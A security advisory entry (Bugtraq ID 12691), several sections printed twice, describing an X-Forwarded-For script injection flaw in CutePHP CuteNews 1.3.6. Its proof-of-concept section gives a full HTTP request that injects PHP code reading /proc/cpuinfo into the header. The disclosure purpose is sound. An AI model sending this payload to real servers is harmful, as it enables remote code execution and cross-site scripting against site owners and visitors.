CutePHP CuteNews X-Forwarded-For Script Injection Vulnerability
BID:12691
Info
CutePHP CuteNews X-Forwarded-For Script Injection Vulnerability
| Bugtraq ID: | 12691 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 01 2005 12:00AM |
| Updated: | Mar 01 2005 12:00AM |
| Credit: | FraMe <[email protected]> is credited with the discovery of this issue. |
| Vulnerable: |
CutePHP CuteNews 1.3.6 |
| Not Vulnerable: | |
Discussion
CutePHP CuteNews X-Forwarded-For Script Injection Vulnerability
A remote script injection vulnerability affects CutePHP CuteNews. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality.
An attacker may leverage this issue to inject arbitrary server-side scripts locally and client-side scripts remotely, potentially facilitating code execution with the privileges of the affected Web server and cross-site scripting attacks.
A remote script injection vulnerability affects CutePHP CuteNews. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality.
An attacker may leverage this issue to inject arbitrary server-side scripts locally and client-side scripts remotely, potentially facilitating code execution with the privileges of the affected Web server and cross-site scripting attacks.
Exploit / POC
CutePHP CuteNews X-Forwarded-For Script Injection Vulnerability
No exploit is required to leverage this issue. The following proof of concept has been provided to facilitate server-side script execution and must be invoked locally:
POST http://localhost/cutenews/show_news.php?subaction=showcomments&id=1108372700&archive=&start_from=&ucat= HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Referer: http://localhost/cutenews/show_news.php?subaction=showcomments&id=1108372700&archive=&start_from=&ucat=
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041111 Firefox/1.0
Content-Length: 124
Content-Type: application/x-www-form-urlencoded
Keep-Alive: 300
X-FORWARDED-FOR: <?include("/proc/cpuinfo");?>
name=proof+of+concept&mail=&comments=proof+of+concept&submit=Add+My+Comment&subaction=addcomment&ucat=&show=&cutepath=/parla
No exploit is required to leverage this issue. The following proof of concept has been provided to facilitate server-side script execution and must be invoked locally:
POST http://localhost/cutenews/show_news.php?subaction=showcomments&id=1108372700&archive=&start_from=&ucat= HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Referer: http://localhost/cutenews/show_news.php?subaction=showcomments&id=1108372700&archive=&start_from=&ucat=
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041111 Firefox/1.0
Content-Length: 124
Content-Type: application/x-www-form-urlencoded
Keep-Alive: 300
X-FORWARDED-FOR: <?include("/proc/cpuinfo");?>
name=proof+of+concept&mail=&comments=proof+of+concept&submit=Add+My+Comment&subaction=addcomment&ucat=&show=&cutepath=/parla
Solution / Fix
CutePHP CuteNews X-Forwarded-For Script Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
CutePHP CuteNews X-Forwarded-For Script Injection Vulnerability
References:
References:
- CuteNews Home Page (CutePHP)
- Kernelpanik Labs Digest 2005-2 ("Kernelpanik Labs - Security Lists"